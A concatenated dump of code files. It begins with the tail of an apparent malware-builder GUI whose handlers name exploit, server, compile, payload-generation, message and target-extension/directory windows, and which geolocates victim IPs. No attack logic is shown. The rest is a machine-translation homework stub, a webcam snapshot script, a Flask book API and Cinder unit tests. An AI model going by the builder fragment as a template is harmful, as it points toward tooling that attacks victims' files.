con = data['continent'] + ' (' + data['continentCode'] + ')'
country = data['country'] + ' (' + data['countryCode'] + ')'
region = data['regionName']
city = data['city']
isp = data['isp'].replace(',', '')
zip = data['zip']
lat = data['lat']
lon = data['lon']
else:
con = 'Error - Fail'
country = 'Error - Fail'
region = 'Error - Fail'
city = 'Error - Fail'
isp = 'Error - Fail'
zip = 'Error - Fail'
lat = 'Error - Fail'
lon = 'Error - Fail'
return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon)
def close_profile(self, event):
self.prof.destroy()
def close_exploit(self, event):
self.exp.destroy()
def close_server(self, event):
self.server_socket.close()
self.serv.destroy()
def close_compile(self, event):
self.comp.destroy()
def close_generate(self, event):
self.gen.destroy()
def close_set_msg(self, event):
self.message.destroy()
def close_set_target_ext(self, event):
self.extentions.destroy()
def close_set_target_dirs(self, event):
self.dirs.destroy()
def exit(self):
sys.exit(0)
def exit_event(self, event):
exit(0)
ventana = MainWindow()
ventana.mainloop()
``` |
{
"source": "2020-Fall-UIUC-LING506/hw2",
"score": 3
} |
#### File: 2020-Fall-UIUC-LING506/hw2/align.py
```python
import argparse
from collections import defaultdict
import sys
from corpus import AlignmentScores, ParallelCorpus
import signal
import pathlib
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def parse_align_flags() -> argparse.Namespace:
"""Parse command line arguments"""
parser = argparse.ArgumentParser(description='Calculate word alignments from a sentence-aligned parallel corpus')
parser.add_argument("-f", "--f_file",
type=str,
default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.f",
help="Path to sentence-aligned French side of the parallel corpus")
parser.add_argument("-e", "--e_file",
type=str,
default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.e",
help="Path to sentence-aligned English side of the parallel corpus")
return parser.parse_args()
def train(corpus: ParallelCorpus) -> AlignmentScores:
# Initialize all alignment scores to zero
alignment_score: AlignmentScores = defaultdict(float)
# Your code to calculate word alignment scores goes here.
#
# You are expected to implement IBM Model 1
return alignment_score
def print_alignments(corpus: ParallelCorpus, alignment_score: AlignmentScores):
"""Print alignments for each parallel sentence"""
for parallel_sentence in corpus:
for (i, f_word) in enumerate(parallel_sentence.f):
for (j, e_word) in enumerate(parallel_sentence.e):
# Your code goes here
pass
if __name__ == "__main__":
# Parse command line arguments
flags = parse_align_flags()
# Construct parallel corpus from user-specified files
parallel_corpus = ParallelCorpus(flags.f_file, flags.e_file, flags.num_sentences)
# Calculate alignment scores using naive baseline algorithm
baseline_alignment_scores: AlignmentScores = train(parallel_corpus)
# Print alignments
print_alignments(parallel_corpus, baseline_alignment_scores)
``` |
{
"source": "2020gupta/automation",
"score": 3
} |
#### File: 2020gupta/automation/take_snapshot.py
```python
import cv2
def take_snapshot():
videoCaptureObject = cv2.VideoCapture(0)
result = True
while(result):
ret,frame = videoCaptureObject.read()
cv2.imwrite("NewPicture1.jpg",frame)
result = False
videoCaptureObject.release()
cv2.destroyAllWindows()
take_snapshot()
``` |
{
"source": "2020HackDiversity-Team12/cscl-api",
"score": 3
} |
#### File: cscl-api/src/main.py
```python
import database
import config
import resources
from flask import Flask, Blueprint, make_response, jsonify
from werkzeug import exceptions as w_exceptions
app = Flask(__name__)
app.config.from_object(config.ProdConfig)
app.register_blueprint(resources.books)
database.init(app)
############################
# CORS #
############################
@app.after_request
def add_headers(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Methods',
'GET, POST, PUT, DELETE')
response.headers.add('Access-Control-Allow-Headers',
'x-requested-with,Content-Type')
response.headers.add('Access-Control-Expose-Headers',
'Content-Type,Content-Length')
return response
############################
# HTTP ERROR HANDLER #
############################
@app.errorhandler(w_exceptions.BadRequest)
def bad_request(err):
resp = jsonify({'status': err.code, 'text': 'bad request'})
return make_response(resp, err.code)
@app.errorhandler(w_exceptions.NotFound)
def not_found(err):
resp = jsonify({'status': err.code, 'text': 'resource not found'})
return make_response(resp, err.code)
@app.errorhandler(w_exceptions.MethodNotAllowed)
def method_not_allowed(err):
resp = jsonify({'status': err.code, 'text': 'method not allowed'})
return make_response(resp, err.code)
if __name__ == "__main__":
app.run()
```
#### File: cscl-api/src/resources.py
```python
from flask import Blueprint, abort, jsonify, request, Response
from database.models import Book
import helpers
import service
import re
books = Blueprint('books', __name__)
HOST = 'https://api-cscl.herokuapp.com'
# ######################
# BOOK ENDPOINTS #
# ######################
@books.route('/api/search', methods=['GET'])
def search():
"""
Retrieve `SIZE_LIMIT` book records based on `q` param
-----------------------------------------------------
Endpoints:
GET /search?q={book_isbn_or_book_title}
@QueryParams:
q: (required) query
@Response:
books: return `SIZE_LIMIT` books that macth the query
next: url to list the next `SIZE_LIMIT` book records
"""
try:
q = request.args.get("q")
regex = re.compile(f'.*{q}.*')
book = Book.objects(title=regex).limit(30)
return jsonify(book)
except:
return jsonify({"Error": "Bad query"})
@books.route('/api/books', methods=['GET'])
def get_books():
"""
Retrieve `SIZE_LIMIT` available book records
-------------------------------------------
Endpoints:
GET /books
GET /books?lastid={last_book_id}
@QueryParams:
lastid: (optional) last book id to implement forward paging system
@Response:
books: return `SIZE_LIMIT` books
next: url to list the next `SIZE_LIMIT` book records
"""
books = None
book_lastid = None
param_lastid = request.args.get("lastid")
if(param_lastid):
books = Book.objects(id__lt=param_lastid).order_by("-_id").limit(30)
else:
books = Book.objects().order_by("-_id").limit(30)
try:
book_lastid = books[len(books) - 1].id
except Exception:
pass
next = f'{HOST}/api/books?lastid={book_lastid}' if book_lastid else None
return jsonify({'books': books, 'next': next})
# Validate books that are created by client (Should we require the images??????)
def ValidateBook(bookObject):
if ("isbn" in bookObject and "title" in bookObject and "author" in bookObject and
"publisher" in bookObject and "publication_year" in bookObject and "copies" in bookObject):
return True
else:
return False
@books.route('/api/books', methods=['POST'])
def create_book():
"""
Create a book record
--------------------
Endpoints:
POST /books
@BodyParams:
isbn: int
title: str
author: str
publisher: str
publication_year: str
copies: int
@Response:
200: return book ID
"""
entry = request.get_json()
if ValidateBook(entry):
newBook = {
"isbn": entry["isbn"],
"title": entry["title"],
"author": entry["author"],
"publisher": entry["publisher"],
"publication_year": entry["publication_year"],
"copies": entry["copies"],
# "image_url_s": entry["image_url_s"],
# "image_url_m": entry["image_url_m"],
# "image_url_l": entry["image_url_l"]
}
newBook["available"] = newBook["copies"]
Book(**newBook).save()
return jsonify(newBook)
else:
return "Invalid Entry"
@books.route('/api/books/<string:isbn>', methods=['GET'])
def get_book(isbn):
"""
Retrieve a specific book record by it's ISBN
---------------------------------------------
Endpoints:
GET /books/isbn
GET /books/isbn?act=(borrow|handback)
@QueryParams:
act: (optional) specific action on book
Possible values: borrow, handback
@Response:
200: return book record
"""
try:
book = Book.objects.get(isbn=isbn)
if request.args.get("act") == "borrow":
if book["available"] > 0:
book["available"] -= 1
else:
return "This book is unavailable"
elif request.args.get("act") == "handback":
if book["available"] < book["copies"]:
book["available"] += 1
else:
return "You can't adda new copy"
book.save()
return jsonify(book)
except:
return "We don't carry this book"
@books.route('/api/books/<string:isbn>', methods=['PUT'])
def update_book(isbn):
"""
Update a specific book record by it's ISBN
------------------------------------------
Endpoints:
PUT /books/isbn
@BodyParams:
isbn: int
title: str
author: str
publisher: str
publication_year: str
copies: int
available: int
image_url_s: url
image_url_m: url
image_url_l: url
@Response:
200: return book id
"""
entry = request.get_json()
try:
Book.objects.get(isbn=isbn).update(**entry)
b = Book.objects.get(isbn=isbn)
return jsonify(b)
except:
return jsonify({"Error": "Invalid Isbn or Invalid request"})
@books.route('/api/books/<string:isbn>', methods=['DELETE'])
def remove_book(isbn):
"""
Update a specific book record by it's ISBN
------------------------------------------
Endpoints:
DELETE /books/isbn
@Response:
200: return book id
"""
try:
book = Book.objects.get(isbn=isbn)
isbn = book.isbn
book.delete()
return jsonify({'success': True, 'isbn': isbn})
except:
return jsonify({"Error": "Invalid isbn"})
return "Book Has been deleted"
@books.route('/api/seed/<int:n>', methods=['GET'])
def seed_database(n):
"""
POPULATE DB WITH FAKE DATA
------------------------------------------
Endpoints:
DELETE /seed/
@Response:
200: BOOKS CREATED
"""
message = None
try:
books = helpers.fake_book(int(n))
[service.create(book) for book in books]
message = 'books created'
except Exception:
message = 'error while populating db'
finally:
return message
``` |
{
"source": "2020human/cinder",
"score": 2
} |
#### File: api/contrib/test_snapshot_actions.py
```python
import mock
from oslo_serialization import jsonutils
import webob
from cinder import context
from cinder import db
from cinder.objects import fields
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit.api.v2 import fakes as v2_fakes
from cinder.tests.unit import fake_constants as fake
def fake_snapshot_get(context, snapshot_id):
snapshot = v2_fakes.fake_snapshot(snapshot_id)
if snapshot_id == fake.SNAPSHOT_ID:
snapshot['status'] = fields.SnapshotStatus.CREATING
else:
snapshot['status'] = fields.SnapshotStatus.ERROR
return snapshot
class SnapshotActionsTest(test.TestCase):
def setUp(self):
super(SnapshotActionsTest, self).setUp()
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
@mock.patch('cinder.db.snapshot_update', autospec=True)
@mock.patch('cinder.db.sqlalchemy.api._snapshot_get',
side_effect=fake_snapshot_get)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_update_snapshot_status(self, metadata_get, *args):
body = {'os-update_snapshot_status':
{'status': fields.SnapshotStatus.AVAILABLE}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(202, res.status_int)
@mock.patch('cinder.db.sqlalchemy.api._snapshot_get',
side_effect=fake_snapshot_get)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_update_snapshot_status_invalid_status(self, metadata_get, *args):
body = {'os-update_snapshot_status': {'status': 'in-use'}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(400, res.status_int)
def test_update_snapshot_status_without_status(self):
self.mock_object(db, 'snapshot_get', fake_snapshot_get)
body = {'os-update_snapshot_status': {}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(400, res.status_int)
```
#### File: api/v3/test_group_snapshots.py
```python
import ddt
import mock
import webob
from cinder.api.v3 import group_snapshots as v3_group_snapshots
from cinder import context
from cinder import db
from cinder import exception
from cinder.group import api as group_api
from cinder import objects
from cinder.objects import fields
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import utils
import cinder.volume
GROUP_MICRO_VERSION = '3.14'
@ddt.ddt
class GroupSnapshotsAPITestCase(test.TestCase):
"""Test Case for group_snapshots API."""
def setUp(self):
super(GroupSnapshotsAPITestCase, self).setUp()
self.controller = v3_group_snapshots.GroupSnapshotsController()
self.volume_api = cinder.volume.API()
self.context = context.get_admin_context()
self.context.project_id = fake.PROJECT_ID
self.context.user_id = fake.USER_ID
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
def test_show_group_snapshot(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context, group_id=group.id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
res_dict = self.controller.show(req, group_snapshot.id)
self.assertEqual(1, len(res_dict))
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshot']['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshot']['name'])
self.assertEqual('creating', res_dict['group_snapshot']['status'])
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_show_group_snapshot_with_group_snapshot_NotFound(self):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID,
fake.WILL_NOT_BE_FOUND_ID),
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.show,
req, fake.WILL_NOT_BE_FOUND_ID)
def test_list_group_snapshots_json(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot1 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
group_snapshot2 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
group_snapshot3 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.index(req)
self.assertEqual(1, len(res_dict))
self.assertEqual(group_snapshot1.id,
res_dict['group_snapshots'][0]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][0]['name'])
self.assertEqual(group_snapshot2.id,
res_dict['group_snapshots'][1]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][1]['name'])
self.assertEqual(group_snapshot3.id,
res_dict['group_snapshots'][2]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][2]['name'])
group_snapshot3.destroy()
group_snapshot2.destroy()
group_snapshot1.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_list_group_snapshots_detail_json(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot1 = utils.create_group_snapshot(
self.context, group_id=group.id)
group_snapshot2 = utils.create_group_snapshot(
self.context, group_id=group.id)
group_snapshot3 = utils.create_group_snapshot(
self.context, group_id=group.id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/detail' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.detail(req)
self.assertEqual(1, len(res_dict))
self.assertEqual(3, len(res_dict['group_snapshots']))
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][0]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][0]['name'])
self.assertEqual(group_snapshot1.id,
res_dict['group_snapshots'][0]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][0]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][1]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][1]['name'])
self.assertEqual(group_snapshot2.id,
res_dict['group_snapshots'][1]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][1]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][2]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][2]['name'])
self.assertEqual(group_snapshot3.id,
res_dict['group_snapshots'][2]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][2]['status'])
group_snapshot3.destroy()
group_snapshot2.destroy()
group_snapshot1.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
@mock.patch('cinder.db.volume_type_get')
@mock.patch('cinder.quota.VolumeTypeQuotaEngine.reserve')
def test_create_group_snapshot_json(self, mock_quota, mock_vol_type,
mock_validate):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.create(req, body)
self.assertEqual(1, len(res_dict))
self.assertIn('id', res_dict['group_snapshot'])
self.assertTrue(mock_validate.called)
group.destroy()
group_snapshot = objects.GroupSnapshot.get_by_id(
context.get_admin_context(), res_dict['group_snapshot']['id'])
db.volume_destroy(context.get_admin_context(),
volume_id)
group_snapshot.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
@mock.patch('cinder.db.volume_type_get')
def test_create_group_snapshot_when_volume_in_error_status(
self, mock_vol_type, mock_validate):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
self.assertTrue(mock_validate.called)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
def test_create_group_snapshot_with_no_body(self):
# omit body from the request
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, None)
@mock.patch.object(group_api.API, 'create_group_snapshot',
side_effect=exception.InvalidGroupSnapshot(
reason='Invalid group snapshot'))
def test_create_with_invalid_group_snapshot(self, mock_create_group_snap):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
@mock.patch.object(group_api.API, 'create_group_snapshot',
side_effect=exception.GroupSnapshotNotFound(
group_snapshot_id='invalid_id'))
def test_create_with_group_snapshot_not_found(self, mock_create_grp_snap):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.create,
req, body)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
def test_create_group_snapshot_from_empty_group(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
group.destroy()
def test_delete_group_snapshot_available(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='available')
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
res_dict = self.controller.delete(req, group_snapshot.id)
group_snapshot = objects.GroupSnapshot.get_by_id(self.context,
group_snapshot.id)
self.assertEqual(202, res_dict.status_int)
self.assertEqual('deleting', group_snapshot.status)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_delete_group_snapshot_available_used_as_source(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='available')
group2 = utils.create_group(
self.context, status='creating',
group_snapshot_id=group_snapshot.id,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, group_snapshot.id)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
group2.destroy()
def test_delete_group_snapshot_with_group_snapshot_NotFound(self):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID,
fake.WILL_NOT_BE_FOUND_ID),
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.delete,
req, fake.WILL_NOT_BE_FOUND_ID)
def test_delete_group_snapshot_with_invalid_group_snapshot(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='invalid')
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, group_snapshot.id)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
@ddt.data(('3.11', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.VersionNotFoundForAPIMethod),
('3.18', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.VersionNotFoundForAPIMethod),
('3.19', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.GroupSnapshotNotFound))
@ddt.unpack
def test_reset_group_snapshot_status_illegal(self, version,
group_snapshot_id,
status, exceptions):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot_id),
version=version)
body = {"reset_status": {
"status": status
}}
self.assertRaises(exceptions,
self.controller.reset_status,
req, group_snapshot_id, body)
def test_reset_group_snapshot_status_invalid_status(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID])
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status=fields.GroupSnapshotStatus.CREATING)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot.id),
version='3.19')
body = {"reset_status": {
"status": "invalid_test_status"
}}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.reset_status,
req, group_snapshot.id, body)
def test_reset_group_snapshot_status(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID])
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status=fields.GroupSnapshotStatus.CREATING)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot.id),
version='3.19')
body = {"reset_status": {
"status": fields.GroupSnapshotStatus.AVAILABLE
}}
response = self.controller.reset_status(req, group_snapshot.id,
body)
g_snapshot = objects.GroupSnapshot.get_by_id(self.context,
group_snapshot.id)
self.assertEqual(202, response.status_int)
self.assertEqual(fields.GroupSnapshotStatus.AVAILABLE,
g_snapshot.status)
```
#### File: unit/consistencygroup/test_cg.py
```python
import ddt
import mock
from oslo_config import cfg
import cinder.consistencygroup
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder.objects import fields
from cinder import quota
from cinder.tests.unit import conf_fixture
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit import fake_volume
from cinder.tests.unit import utils as tests_utils
from cinder.tests.unit import volume as base
import cinder.volume
from cinder.volume import driver
from cinder.volume import utils as volutils
CGQUOTAS = quota.CGQUOTAS
CONF = cfg.CONF
@ddt.ddt
class ConsistencyGroupTestCase(base.BaseVolumeTestCase):
def test_delete_volume_in_consistency_group(self):
"""Test deleting a volume that's tied to a consistency group fails."""
consistencygroup_id = fake.CONSISTENCY_GROUP_ID
volume_api = cinder.volume.api.API()
self.volume_params.update({'status': 'available',
'consistencygroup_id': consistencygroup_id})
volume = tests_utils.create_volume(self.context, **self.volume_params)
self.assertRaises(exception.InvalidVolume,
volume_api.delete, self.context, volume)
@mock.patch.object(CGQUOTAS, "reserve",
return_value=["RESERVATION"])
@mock.patch.object(CGQUOTAS, "commit")
@mock.patch.object(CGQUOTAS, "rollback")
@mock.patch.object(driver.VolumeDriver,
"delete_consistencygroup",
return_value=({'status': (
fields.ConsistencyGroupStatus.DELETED)}, []))
def test_create_delete_consistencygroup(self, fake_delete_cg,
fake_rollback,
fake_commit, fake_reserve):
"""Test consistencygroup can be created and deleted."""
def fake_driver_create_cg(context, group):
"""Make sure that the pool is part of the host."""
self.assertIn('host', group)
host = group.host
pool = volutils.extract_host(host, level='pool')
self.assertEqual('fakepool', pool)
return {'status': 'available'}
self.mock_object(self.volume.driver, 'create_consistencygroup',
fake_driver_create_cg)
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
host='fakehost@fakedrv#fakepool')
group = objects.ConsistencyGroup.get_by_id(self.context, group.id)
self.assertEqual(0, len(self.notifier.notifications),
self.notifier.notifications)
self.volume.create_consistencygroup(self.context, group)
self.assertEqual(2, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[0]
self.assertEqual('consistencygroup.create.start', msg['event_type'])
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group.id
}
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[1]
self.assertEqual('consistencygroup.create.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
self.assertEqual(
group.id,
objects.ConsistencyGroup.get_by_id(context.get_admin_context(),
group.id).id)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'), group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertEqual(4, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[2]
self.assertEqual('consistencygroup.delete.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[3]
self.assertEqual('consistencygroup.delete.end', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.DELETED
self.assertDictEqual(expected, msg['payload'])
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
@mock.patch.object(CGQUOTAS, "reserve",
return_value=["RESERVATION"])
@mock.patch.object(CGQUOTAS, "commit")
@mock.patch.object(CGQUOTAS, "rollback")
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"update_consistencygroup")
def test_update_consistencygroup(self, fake_update_cg,
fake_create_cg, fake_rollback,
fake_commit, fake_reserve):
"""Test consistencygroup can be updated."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.volume.create_consistencygroup(self.context, group)
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
volume2 = tests_utils.create_volume(
self.context,
consistencygroup_id=None,
**self.volume_params)
self.volume.create_volume(self.context, volume2)
fake_update_cg.return_value = (
{'status': fields.ConsistencyGroupStatus.AVAILABLE},
[{'id': volume2.id, 'status': 'available'}],
[{'id': volume.id, 'status': 'available'}])
self.volume.update_consistencygroup(self.context, group,
add_volumes=volume2.id,
remove_volumes=volume.id)
cg = objects.ConsistencyGroup.get_by_id(self.context, group.id)
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
